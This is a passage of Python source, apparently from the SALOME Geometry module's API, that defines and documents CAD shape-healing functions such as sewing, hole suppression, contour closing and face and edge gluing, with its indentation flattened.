ListObj = self.ShapesOp.MakeExplode(aShape, EnumToLong( aType ), True)
RaiseIfFailed("MakeExplode", self.ShapesOp)
self._autoPublish(ListObj, theName, "subshape")
return ListObj
## Deprecated method
# It works like SubShapeAllSortedCentresIDs(), but wrongly
# defines centres of faces, shells and solids.
@ManageTransactions("ShapesOp")
def SubShapeAllSortedIDs(self, aShape, aType):
"""
Deprecated method
It works like geompy.SubShapeAllSortedCentresIDs, but wrongly
defines centres of faces, shells and solids.
"""
ListIDs = self.ShapesOp.SubShapeAllIDs(aShape, EnumToLong( aType ), True)
RaiseIfFailed("SubShapeAllIDs", self.ShapesOp)
return ListIDs
## Deprecated method
# It works like SubShapeSortedCentres(), but has a bug
# (wrongly defines centres of faces, shells and solids).
def SubShapeSorted(self, aShape, aType, ListOfInd, theName=None):
"""
Deprecated method
It works like geompy.SubShapeSortedCentres, but has a bug
(wrongly defines centres of faces, shells and solids).
"""
ListOfIDs = []
AllShapeIDsList = self.SubShapeAllSortedIDs(aShape, EnumToLong( aType ))
for ind in ListOfInd:
ListOfIDs.append(AllShapeIDsList[ind - 1])
# note: auto-publishing is done in self.GetSubShape()
anObj = self.GetSubShape(aShape, ListOfIDs, theName)
return anObj
# end of l4_decompose_d
## @}
## @addtogroup l3_healing
## @{
## Apply a sequence of Shape Healing operators to the given object.
# @param theShape Shape to be processed.
# @param theOperators List of names of operators ("FixShape", "SplitClosedFaces", etc.).
# @param theParameters List of names of parameters
# ("FixShape.Tolerance3d", "SplitClosedFaces.NbSplitPoints", etc.).
# @param theValues List of values of parameters, in the same order
# as parameters are listed in <VAR>theParameters</VAR> list.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# <b> Operators and Parameters: </b> \n
#
# * \b FixShape - corrects invalid shapes. \n
# - \b FixShape.Tolerance3d - work tolerance for detection of the problems and correction of them. \n
# - \b FixShape.MaxTolerance3d - maximal possible tolerance of the shape after correction. \n
#
# * \b FixFaceSize - removes small faces, such as spots and strips.\n
# - \b FixFaceSize.Tolerance - defines minimum possible face size. \n
# - \b DropSmallEdges - removes edges, which merge with neighbouring edges. \n
# - \b DropSmallEdges.Tolerance3d - defines minimum possible distance between two parallel edges.\n
#
# * \b SplitAngle - splits faces based on conical surfaces, surfaces of revolution and cylindrical
# surfaces in segments using a certain angle. \n
# - \b SplitAngle.Angle - the central angle of the resulting segments (i.e. we obtain two segments
# if Angle=180, four if Angle=90, etc). \n
# - \b SplitAngle.MaxTolerance - maximum possible tolerance among the resulting segments.\n
#
# * \b SplitClosedFaces - splits closed faces in segments.
# The number of segments depends on the number of splitting points.\n
# - \b SplitClosedFaces.NbSplitPoints - the number of splitting points.\n
#
# * \b SplitContinuity - splits shapes to reduce continuities of curves and surfaces.\n
# - \b SplitContinuity.Tolerance3d - 3D tolerance for correction of geometry.\n
# - \b SplitContinuity.SurfaceContinuity - required continuity for surfaces.\n
# - \b SplitContinuity.CurveContinuity - required continuity for curves.\n
# This and the previous parameters can take the following values:\n
# \b Parametric \b Continuity \n
# \b C0 (Positional Continuity): curves are joined (the end positions of curves or surfaces
# are coincidental. The curves or surfaces may still meet at an angle, giving rise to a sharp corner or edge).\n
# \b C1 (Tangential Continuity): first derivatives are equal (the end vectors of curves or surfaces are parallel,
# ruling out sharp edges).\n
# \b C2 (Curvature Continuity): first and second derivatives are equal (the end vectors of curves or surfaces
# are of the same magnitude).\n
# \b CN N-th derivatives are equal (both the direction and the magnitude of the Nth derivatives of curves
# or surfaces (d/du C(u)) are the same at junction. \n
# \b Geometric \b Continuity \n
# \b G1: first derivatives are proportional at junction.\n
# The curve tangents thus have the same direction, but not necessarily the same magnitude.
# i.e., C1'(1) = (a,b,c) and C2'(0) = (k*a, k*b, k*c).\n
# \b G2: first and second derivatives are proportional at junction.
# As the names imply, geometric continuity requires the geometry to be continuous, while parametric
# continuity requires that the underlying parameterization was continuous as well.
# Parametric continuity of order n implies geometric continuity of order n, but not vice-versa.\n
#
# * \b BsplineRestriction - converts curves and surfaces to Bsplines and processes them with the following parameters:\n
# - \b BSplineRestriction.SurfaceMode - approximation of surfaces if restriction is necessary.\n
# - \b BSplineRestriction.Curve3dMode - conversion of any 3D curve to BSpline and approximation.\n
# - \b BSplineRestriction.Curve2dMode - conversion of any 2D curve to BSpline and approximation.\n
# - \b BSplineRestriction.Tolerance3d - defines the possibility of surfaces and 3D curves approximation
# with the specified parameters.\n
# - \b BSplineRestriction.Tolerance2d - defines the possibility of surfaces and 2D curves approximation
# with the specified parameters.\n
# - \b BSplineRestriction.RequiredDegree - required degree of the resulting BSplines.\n
# - \b BSplineRestriction.RequiredNbSegments - required maximum number of segments of resultant BSplines.\n
# - \b BSplineRestriction.Continuity3d - continuity of the resulting surfaces and 3D curves.\n
# - \b BSplineRestriction.Continuity2d - continuity of the resulting 2D curves.\n
#
# * \b ToBezier - converts curves and surfaces of any type to Bezier curves and surfaces.\n
# - \b ToBezier.SurfaceMode - if checked in, allows conversion of surfaces.\n
# - \b ToBezier.Curve3dMode - if checked in, allows conversion of 3D curves.\n
# - \b ToBezier.Curve2dMode - if checked in, allows conversion of 2D curves.\n
# - \b ToBezier.MaxTolerance - defines tolerance for detection and correction of problems.\n
#
# * \b SameParameter - fixes edges of 2D and 3D curves not having the same parameter.\n
# - \b SameParameter.Tolerance3d - defines tolerance for fixing of edges.\n
#
#
# @return New GEOM.GEOM_Object, containing processed shape.
#
# \n @ref tui_shape_processing "Example"
@ManageTransactions("HealOp")
def ProcessShape(self, theShape, theOperators, theParameters, theValues, theName=None):
"""
Apply a sequence of Shape Healing operators to the given object.
Parameters:
theShape Shape to be processed.
theValues List of values of parameters, in the same order
as parameters are listed in theParameters list.
theOperators List of names of operators ("FixShape", "SplitClosedFaces", etc.).
theParameters List of names of parameters
("FixShape.Tolerance3d", "SplitClosedFaces.NbSplitPoints", etc.).
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Operators and Parameters:
* FixShape - corrects invalid shapes.
* FixShape.Tolerance3d - work tolerance for detection of the problems and correction of them.
* FixShape.MaxTolerance3d - maximal possible tolerance of the shape after correction.
* FixFaceSize - removes small faces, such as spots and strips.
* FixFaceSize.Tolerance - defines minimum possible face size.
* DropSmallEdges - removes edges, which merge with neighbouring edges.
* DropSmallEdges.Tolerance3d - defines minimum possible distance between two parallel edges.
* SplitAngle - splits faces based on conical surfaces, surfaces of revolution and cylindrical surfaces
in segments using a certain angle.
* SplitAngle.Angle - the central angle of the resulting segments (i.e. we obtain two segments
if Angle=180, four if Angle=90, etc).
* SplitAngle.MaxTolerance - maximum possible tolerance among the resulting segments.
* SplitClosedFaces - splits closed faces in segments. The number of segments depends on the number of
splitting points.
* SplitClosedFaces.NbSplitPoints - the number of splitting points.
* SplitContinuity - splits shapes to reduce continuities of curves and surfaces.
* SplitContinuity.Tolerance3d - 3D tolerance for correction of geometry.
* SplitContinuity.SurfaceContinuity - required continuity for surfaces.
* SplitContinuity.CurveContinuity - required continuity for curves.
This and the previous parameters can take the following values:
Parametric Continuity:
C0 (Positional Continuity): curves are joined (the end positions of curves or surfaces are
coincidental. The curves or surfaces may still meet at an angle,
giving rise to a sharp corner or edge).
C1 (Tangential Continuity): first derivatives are equal (the end vectors of curves or surfaces
are parallel, ruling out sharp edges).
C2 (Curvature Continuity): first and second derivatives are equal (the end vectors of curves
or surfaces are of the same magnitude).
CN N-th derivatives are equal (both the direction and the magnitude of the Nth derivatives of
curves or surfaces (d/du C(u)) are the same at junction.
Geometric Continuity:
G1: first derivatives are proportional at junction.
The curve tangents thus have the same direction, but not necessarily the same magnitude.
i.e., C1'(1) = (a,b,c) and C2'(0) = (k*a, k*b, k*c).
G2: first and second derivatives are proportional at junction. As the names imply,
geometric continuity requires the geometry to be continuous, while parametric continuity requires
that the underlying parameterization was continuous as well. Parametric continuity of order n implies
geometric continuity of order n, but not vice-versa.
* BsplineRestriction - converts curves and surfaces to Bsplines and processes them with the following parameters:
* BSplineRestriction.SurfaceMode - approximation of surfaces if restriction is necessary.
* BSplineRestriction.Curve3dMode - conversion of any 3D curve to BSpline and approximation.
* BSplineRestriction.Curve2dMode - conversion of any 2D curve to BSpline and approximation.
* BSplineRestriction.Tolerance3d - defines the possibility of surfaces and 3D curves approximation with
the specified parameters.
* BSplineRestriction.Tolerance2d - defines the possibility of surfaces and 2D curves approximation with
the specified parameters.
* BSplineRestriction.RequiredDegree - required degree of the resulting BSplines.
* BSplineRestriction.RequiredNbSegments - required maximum number of segments of resultant BSplines.
* BSplineRestriction.Continuity3d - continuity of the resulting surfaces and 3D curves.
* BSplineRestriction.Continuity2d - continuity of the resulting 2D curves.
* ToBezier - converts curves and surfaces of any type to Bezier curves and surfaces.
* ToBezier.SurfaceMode - if checked in, allows conversion of surfaces.
* ToBezier.Curve3dMode - if checked in, allows conversion of 3D curves.
* ToBezier.Curve2dMode - if checked in, allows conversion of 2D curves.
* ToBezier.MaxTolerance - defines tolerance for detection and correction of problems.
* SameParameter - fixes edges of 2D and 3D curves not having the same parameter.
* SameParameter.Tolerance3d - defines tolerance for fixing of edges.
Returns:
New GEOM.GEOM_Object, containing processed shape.
Note: For more information look through SALOME Geometry User's Guide->
-> Introduction to Geometry-> Repairing Operations-> Shape Processing
"""
# Example: see GEOM_TestHealing.py
theValues,Parameters = ParseList(theValues)
anObj = self.HealOp.ProcessShape(theShape, theOperators, theParameters, theValues)
# To avoid script failure in case of good argument shape
if self.HealOp.GetErrorCode() == "ShHealOper_NotError_msg":
return theShape
RaiseIfFailed("ProcessShape", self.HealOp)
for string in (theOperators + theParameters):
Parameters = ":" + Parameters
pass
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "healed")
return anObj
## Remove faces from the given object (shape).
# @param theObject Shape to be processed.
# @param theFaces Indices of faces to be removed, if EMPTY then the method
# removes ALL faces of the given object.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing processed shape.
#
# @ref tui_suppress_faces "Example"
@ManageTransactions("HealOp")
def SuppressFaces(self, theObject, theFaces, theName=None):
"""
Remove faces from the given object (shape).
Parameters:
theObject Shape to be processed.
theFaces Indices of faces to be removed, if EMPTY then the method
removes ALL faces of the given object.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing processed shape.
"""
# Example: see GEOM_TestHealing.py
anObj = self.HealOp.SuppressFaces(theObject, theFaces)
RaiseIfFailed("SuppressFaces", self.HealOp)
self._autoPublish(anObj, theName, "suppressFaces")
return anObj
## Sewing of some shapes into single shape.
# @param ListShape Shapes to be processed.
# @param theTolerance Required tolerance value.
# @param AllowNonManifold Flag that allows non-manifold sewing.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing processed shape.
#
# @ref tui_sewing "Example"
def MakeSewing(self, ListShape, theTolerance, AllowNonManifold=False, theName=None):
"""
Sewing of some shapes into single shape.
Parameters:
ListShape Shapes to be processed.
theTolerance Required tolerance value.
AllowNonManifold Flag that allows non-manifold sewing.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing processed shape.
"""
# Example: see GEOM_TestHealing.py
comp = self.MakeCompound(ListShape)
# note: auto-publishing is done in self.Sew()
anObj = self.Sew(comp, theTolerance, AllowNonManifold, theName)
return anObj
## Sewing of the given object.
# @param theObject Shape to be processed.
# @param theTolerance Required tolerance value.
# @param AllowNonManifold Flag that allows non-manifold sewing.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing processed shape.
@ManageTransactions("HealOp")
def Sew(self, theObject, theTolerance, AllowNonManifold=False, theName=None):
"""
Sewing of the given object.
Parameters:
theObject Shape to be processed.
theTolerance Required tolerance value.
AllowNonManifold Flag that allows non-manifold sewing.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing processed shape.
"""
# Example: see MakeSewing() above
theTolerance,Parameters = ParseParameters(theTolerance)
if AllowNonManifold:
anObj = self.HealOp.SewAllowNonManifold(theObject, theTolerance)
else:
anObj = self.HealOp.Sew(theObject, theTolerance)
# To avoid script failure in case of good argument shape
if self.HealOp.GetErrorCode() == "ShHealOper_NotError_msg":
return theObject
RaiseIfFailed("Sew", self.HealOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "sewed")
return anObj
## Rebuild the topology of theCompound of solids by removing
# of the faces that are shared by several solids.
# @param theCompound Shape to be processed.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing processed shape.
#
# @ref tui_remove_webs "Example"
@ManageTransactions("HealOp")
def RemoveInternalFaces (self, theCompound, theName=None):
"""
Rebuild the topology of theCompound of solids by removing
of the faces that are shared by several solids.
Parameters:
theCompound Shape to be processed.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing processed shape.
"""
# Example: see GEOM_TestHealing.py
anObj = self.HealOp.RemoveInternalFaces(theCompound)
RaiseIfFailed("RemoveInternalFaces", self.HealOp)
self._autoPublish(anObj, theName, "removeWebs")
return anObj
## Remove internal wires and edges from the given object (face).
# @param theObject Shape to be processed.
# @param theWires Indices of wires to be removed, if EMPTY then the method
# removes ALL internal wires of the given object.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing processed shape.
#
# @ref tui_suppress_internal_wires "Example"
@ManageTransactions("HealOp")
def SuppressInternalWires(self, theObject, theWires, theName=None):
"""
Remove internal wires and edges from the given object (face).
Parameters:
theObject Shape to be processed.
theWires Indices of wires to be removed, if EMPTY then the method
removes ALL internal wires of the given object.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing processed shape.
"""
# Example: see GEOM_TestHealing.py
anObj = self.HealOp.RemoveIntWires(theObject, theWires)
RaiseIfFailed("RemoveIntWires", self.HealOp)
self._autoPublish(anObj, theName, "suppressWires")
return anObj
## Remove internal closed contours (holes) from the given object.
# @param theObject Shape to be processed.
# @param theWires Indices of wires to be removed, if EMPTY then the method
# removes ALL internal holes of the given object
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing processed shape.
#
# @ref tui_suppress_holes "Example"
@ManageTransactions("HealOp")
def SuppressHoles(self, theObject, theWires, theName=None):
"""
Remove internal closed contours (holes) from the given object.
Parameters:
theObject Shape to be processed.
theWires Indices of wires to be removed, if EMPTY then the method
removes ALL internal holes of the given object
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing processed shape.
"""
# Example: see GEOM_TestHealing.py
anObj = self.HealOp.FillHoles(theObject, theWires)
RaiseIfFailed("FillHoles", self.HealOp)
self._autoPublish(anObj, theName, "suppressHoles")
return anObj
## Close an open wire.
# @param theObject Shape to be processed.
# @param theWires Indexes of edge(s) and wire(s) to be closed within <VAR>theObject</VAR>'s shape,
# if [ ], then <VAR>theObject</VAR> itself is a wire.
# @param isCommonVertex If True : closure by creation of a common vertex,
# If False : closure by creation of an edge between ends.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing processed shape.
#
# @ref tui_close_contour "Example"
@ManageTransactions("HealOp")
def CloseContour(self,theObject, theWires, isCommonVertex, theName=None):
"""
Close an open wire.
Parameters:
theObject Shape to be processed.
theWires Indexes of edge(s) and wire(s) to be closed within theObject's shape,
if [ ], then theObject itself is a wire.
isCommonVertex If True : closure by creation of a common vertex,
If False : closure by creation of an edge between ends.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing processed shape.
"""
# Example: see GEOM_TestHealing.py
anObj = self.HealOp.CloseContour(theObject, theWires, isCommonVertex)
RaiseIfFailed("CloseContour", self.HealOp)
self._autoPublish(anObj, theName, "closeContour")
return anObj
## Addition of a point to a given edge object.
# @param theObject Shape to be processed.
# @param theEdgeIndex Index of edge to be divided within theObject's shape,
# if -1, then theObject itself is the edge.
# @param theValue Value of parameter on edge or length parameter,
# depending on \a isByParameter.
# @param isByParameter If TRUE : \a theValue is treated as a curve parameter [0..1], \n
# if FALSE : \a theValue is treated as a length parameter [0..1]
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing processed shape.
#
# @ref tui_add_point_on_edge "Example"
@ManageTransactions("HealOp")
def DivideEdge(self, theObject, theEdgeIndex, theValue, isByParameter, theName=None):
"""
Addition of a point to a given edge object.
Parameters:
theObject Shape to be processed.
theEdgeIndex Index of edge to be divided within theObject's shape,
if -1, then theObject itself is the edge.
theValue Value of parameter on edge or length parameter,
depending on isByParameter.
isByParameter If TRUE : theValue is treated as a curve parameter [0..1],
if FALSE : theValue is treated as a length parameter [0..1]
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing processed shape.
"""
# Example: see GEOM_TestHealing.py
theEdgeIndex,theValue,isByParameter,Parameters = ParseParameters(theEdgeIndex,theValue,isByParameter)
anObj = self.HealOp.DivideEdge(theObject, theEdgeIndex, theValue, isByParameter)
RaiseIfFailed("DivideEdge", self.HealOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "divideEdge")
return anObj
## Suppress the vertices in the wire in case if adjacent edges are C1 continuous.
# @param theWire Wire to minimize the number of C1 continuous edges in.
# @param theVertices A list of vertices to suppress. If the list
# is empty, all vertices in a wire will be assumed.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object with modified wire.
#
# @ref tui_fuse_collinear_edges "Example"
@ManageTransactions("HealOp")
def FuseCollinearEdgesWithinWire(self, theWire, theVertices = [], theName=None):
"""
Suppress the vertices in the wire in case if adjacent edges are C1 continuous.
Parameters:
theWire Wire to minimize the number of C1 continuous edges in.
theVertices A list of vertices to suppress. If the list
is empty, all vertices in a wire will be assumed.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object with modified wire.
"""
anObj = self.HealOp.FuseCollinearEdgesWithinWire(theWire, theVertices)
RaiseIfFailed("FuseCollinearEdgesWithinWire", self.HealOp)
self._autoPublish(anObj, theName, "fuseEdges")
return anObj
## Change orientation of the given object. Updates given shape.
# @param theObject Shape to be processed.
# @return Updated <var>theObject</var>
#
# @ref swig_todo "Example"
@ManageTransactions("HealOp")
def ChangeOrientationShell(self,theObject):
"""
Change orientation of the given object. Updates given shape.
Parameters:
theObject Shape to be processed.
Returns:
Updated theObject
"""
theObject = self.HealOp.ChangeOrientation(theObject)
RaiseIfFailed("ChangeOrientation", self.HealOp)
pass
## Change orientation of the given object.
# @param theObject Shape to be processed.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing processed shape.
#
# @ref swig_todo "Example"
@ManageTransactions("HealOp")
def ChangeOrientationShellCopy(self, theObject, theName=None):
"""
Change orientation of the given object.
Parameters:
theObject Shape to be processed.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing processed shape.
"""
anObj = self.HealOp.ChangeOrientationCopy(theObject)
RaiseIfFailed("ChangeOrientationCopy", self.HealOp)
self._autoPublish(anObj, theName, "reversed")
return anObj
## Try to limit tolerance of the given object by value \a theTolerance.
# @param theObject Shape to be processed.
# @param theTolerance Required tolerance value.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing processed shape.
#
# @ref tui_limit_tolerance "Example"
@ManageTransactions("HealOp")
def LimitTolerance(self, theObject, theTolerance = 1e-07, theName=None):
"""
Try to limit tolerance of the given object by value theTolerance.
Parameters:
theObject Shape to be processed.
theTolerance Required tolerance value.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing processed shape.
"""
anObj = self.HealOp.LimitTolerance(theObject, theTolerance)
RaiseIfFailed("LimitTolerance", self.HealOp)
self._autoPublish(anObj, theName, "limitTolerance")
return anObj
## Get a list of wires (wrapped in GEOM.GEOM_Object-s),
# that constitute a free boundary of the given shape.
# @param theObject Shape to get free boundary of.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return [\a status, \a theClosedWires, \a theOpenWires]
# \n \a status: FALSE, if an error(s) occured during the method execution.
# \n \a theClosedWires: Closed wires on the free boundary of the given shape.
# \n \a theOpenWires: Open wires on the free boundary of the given shape.
#
# @ref tui_measurement_tools_page "Example"
@ManageTransactions("HealOp")
def GetFreeBoundary(self, theObject, theName=None):
"""
Get a list of wires (wrapped in GEOM.GEOM_Object-s),
that constitute a free boundary of the given shape.
Parameters:
theObject Shape to get free boundary of.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
[status, theClosedWires, theOpenWires]
status: FALSE, if an error(s) occured during the method execution.
theClosedWires: Closed wires on the free boundary of the given shape.
theOpenWires: Open wires on the free boundary of the given shape.
"""
# Example: see GEOM_TestHealing.py
anObj = self.HealOp.GetFreeBoundary(theObject)
RaiseIfFailed("GetFreeBoundary", self.HealOp)
self._autoPublish(anObj[1], theName, "closedWire")
self._autoPublish(anObj[2], theName, "openWire")
return anObj
## Replace coincident faces in theShape by one face.
# @param theShape Initial shape.
# @param theTolerance Maximum distance between faces, which can be considered as coincident.
# @param doKeepNonSolids If FALSE, only solids will present in the result,
# otherwise all initial shapes.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing a copy of theShape without coincident faces.
#
# @ref tui_glue_faces "Example"
@ManageTransactions("ShapesOp")
def MakeGlueFaces(self, theShape, theTolerance, doKeepNonSolids=True, theName=None):
"""
Replace coincident faces in theShape by one face.
Parameters:
theShape Initial shape.
theTolerance Maximum distance between faces, which can be considered as coincident.
doKeepNonSolids If FALSE, only solids will present in the result,
otherwise all initial shapes.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing a copy of theShape without coincident faces.
"""
# Example: see GEOM_Spanner.py
theTolerance,Parameters = ParseParameters(theTolerance)
anObj = self.ShapesOp.MakeGlueFaces(theShape, theTolerance, doKeepNonSolids)
if anObj is None:
raise RuntimeError, "MakeGlueFaces : " + self.ShapesOp.GetErrorCode()
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "glueFaces")
return anObj
## Find coincident faces in theShape for possible gluing.
# @param theShape Initial shape.
# @param theTolerance Maximum distance between faces,
# which can be considered as coincident.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return GEOM.ListOfGO
#
# @ref tui_glue_faces "Example"
@ManageTransactions("ShapesOp")
def GetGlueFaces(self, theShape, theTolerance, theName=None):
"""
Find coincident faces in theShape for possible gluing.
Parameters:
theShape Initial shape.
theTolerance Maximum distance between faces,
which can be considered as coincident.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
GEOM.ListOfGO
"""
anObj = self.ShapesOp.GetGlueFaces(theShape, theTolerance)
RaiseIfFailed("GetGlueFaces", self.ShapesOp)
self._autoPublish(anObj, theName, "facesToGlue")
return anObj
## Replace coincident faces in theShape by one face
# in compliance with given list of faces
# @param theShape Initial shape.
# @param theTolerance Maximum distance between faces,
# which can be considered as coincident.
# @param theFaces List of faces for gluing.
# @param doKeepNonSolids If FALSE, only solids will present in the result,
# otherwise all initial shapes.
# @param doGlueAllEdges If TRUE, all coincident edges of <VAR>theShape</VAR>
# will be glued, otherwise only the edges,
# belonging to <VAR>theFaces</VAR>.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing a copy of theShape
# without some faces.
#
# @ref tui_glue_faces "Example"
@ManageTransactions("ShapesOp")
def MakeGlueFacesByList(self, theShape, theTolerance, theFaces,
doKeepNonSolids=True, doGlueAllEdges=True, theName=None):
"""
Replace coincident faces in theShape by one face
in compliance with given list of faces
Parameters:
theShape Initial shape.
theTolerance Maximum distance between faces,
which can be considered as coincident.
theFaces List of faces for gluing.
doKeepNonSolids If FALSE, only solids will present in the result,
otherwise all initial shapes.
doGlueAllEdges If TRUE, all coincident edges of theShape
will be glued, otherwise only the edges,
belonging to theFaces.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing a copy of theShape
without some faces.
"""
anObj = self.ShapesOp.MakeGlueFacesByList(theShape, theTolerance, theFaces,
doKeepNonSolids, doGlueAllEdges)
if anObj is None:
raise RuntimeError, "MakeGlueFacesByList : " + self.ShapesOp.GetErrorCode()
self._autoPublish(anObj, theName, "glueFaces")
return anObj
## Replace coincident edges in theShape by one edge.
# @param theShape Initial shape.
# @param theTolerance Maximum distance between edges, which can be considered as coincident.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing a copy of theShape without coincident edges.
#
# @ref tui_glue_edges "Example"
@ManageTransactions("ShapesOp")
def MakeGlueEdges(self, theShape, theTolerance, theName=None):
"""
Replace coincident edges in theShape by one edge.
Parameters:
theShape Initial shape.
theTolerance Maximum distance between edges, which can be considered as coincident.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing a copy of theShape without coincident edges.
"""
theTolerance,Parameters = ParseParameters(theTolerance)
anObj = self.ShapesOp.MakeGlueEdges(theShape, theTolerance)
if anObj is None:
raise RuntimeError, "MakeGlueEdges : " + self.ShapesOp.GetErrorCode()
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "glueEdges")
return anObj
## Find coincident edges in theShape for possible gluing.
# @param theShape Initial shape.
# @param theTolerance Maximum distance between edges,
# which can be considered as coincident.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return GEOM.ListOfGO
#
# @ref tui_glue_edges "Example"
@ManageTransactions("ShapesOp")
def GetGlueEdges(self, theShape, theTolerance, theName=None):
"""
Find coincident edges in theShape for possible gluing.
Parameters:
theShape Initial shape.
theTolerance Maximum distance between edges,
which can be considered as coincident.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
GEOM.ListOfGO
"""
anObj = self.ShapesOp.GetGlueEdges(theShape, theTolerance)
RaiseIfFailed("GetGlueEdges", self.ShapesOp)
self._autoPublish(anObj, theName, "edgesToGlue")
return anObj
## Replace coincident edges in theShape by one edge
# in compliance with given list of edges.
# @param theShape Initial shape.
# @param theTolerance Maximum distance between edges,
# which can be considered as coincident.
# @param theEdges List of edges for gluing.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing a copy of theShape
# without some edges.
#
# @ref tui_glue_edges "Example"
@ManageTransactions("ShapesOp")
def MakeGlueEdgesByList(self, theShape, theTolerance, theEdges, theName=None):
"""
Replace coincident edges in theShape by one edge
in compliance with given list of edges.
Parameters:
theShape Initial shape.
theTolerance Maximum distance between edges,
which can be considered as coincident.
theEdges List of edges for gluing.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing a copy of theShape
without some edges.
"""
anObj = self.ShapesOp.MakeGlueEdgesByList(theShape, theTolerance, theEdges)
if anObj is None:
raise RuntimeError, "MakeGlueEdgesByList : " + self.ShapesOp.GetErrorCode()
self._autoPublish(anObj, theName, "glueEdges")
return anObj
# end of l3_healing
## @}
## @addtogroup l3_boolean Boolean Operations
## @{
# -----------------------------------------------------------------------------
# Boolean (Common, Cut, Fuse, Section)
# -----------------------------------------------------------------------------
## Perform one of boolean operations on two given shapes.
# @param theShape1 First argument for boolean operation.
# @param theShape2 Second argument for boolean operation.
# @param theOperation Indicates the operation to be done:\n
# 1 - Common, 2 - Cut, 3 - Fuse, 4 - Section.
